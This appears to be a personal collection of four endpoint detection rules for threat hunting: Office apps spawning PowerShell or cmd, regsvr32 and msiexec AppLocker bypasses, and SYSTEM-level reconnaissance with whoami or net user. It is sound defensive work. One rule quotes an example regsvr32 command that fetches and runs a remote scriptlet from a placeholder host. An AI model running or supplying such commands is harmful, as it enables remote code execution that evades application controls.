- Summary
- Detection Logics
Summary
This is my collection of detection logics for current threats as it results from personal research. As the list grows, I will develop a framework that will encapsulate everything in a table. Eventually this will also be retrievable in JSON format.
Detection Logics
001 - Powershell or Cmd spawned by Office Application
This IOC is meant to capture covert instances of cmd or powershell spawned by Microsoft Office applications as a result of exploit activity. The delivery method can be multiple: email with attachments, link in emails, Word documents, Power Point presentations, Excel spreadsheets, etc.
Logic
Path of Parent Process *contains* "office"
Process Name *contains* "powershell" or "cmd"
Path of Parent Process *not equals* "C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe" or "C:\Program Files\Microsoft Office Servers\15.0\Synchronization Service\Bin\miiserver.exe" or "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
False Positives
Medium FP ratio
002 - Applocker Bypass Methodology 01: regsvr32.exe launching script
This IOC will detect instances of AppLocker bypass methodologies as well as stealth malicious program executions. When regsvr32 launches with some parameters involving a URL it may indicate malicious intent. For example: regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll
Logic
The detection needs to reflect the fact that regsvr32.exe might be changed to any other name and still be regsvr32.
Process CommandLine *contains* ("regsvr32" AND "http") OR ("/i" AND "http" AND "scrobj.dll")
False Positives
Low FP ratio
003 - APT Activity 01: gathering info from victim
This IOC will aims to detect instances of cmd.exe being launched under certain conditions: 1) the account must be NT AUTHORITY\SYSTEM, 2) the process commandline must contain either “whoami” or “net user” which are, in multiple combinations and with different switches (like net user /groups) used to gather intel about the current user status in the system after an initial compromise.
Logic
Process Name *equals* "cmd.exe"
Process CommandLine *contains* "whoami" OR "net user"
Process UserName *contains* "SYSTEM"
False Positives
Low FP ratio
004 - Applocker Bypass Methodology 02: MSIEXEC.EXE
Msiexe.exe can be used to launch covert applications either over the network or locally. It can even execute code from a script renamed to a .png file!.
References
https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
Logic
Process Name *equals* "msiexec.exe"
Process CommandLine *contains* "http" OR ".png"
False Positives
Medium FP ratio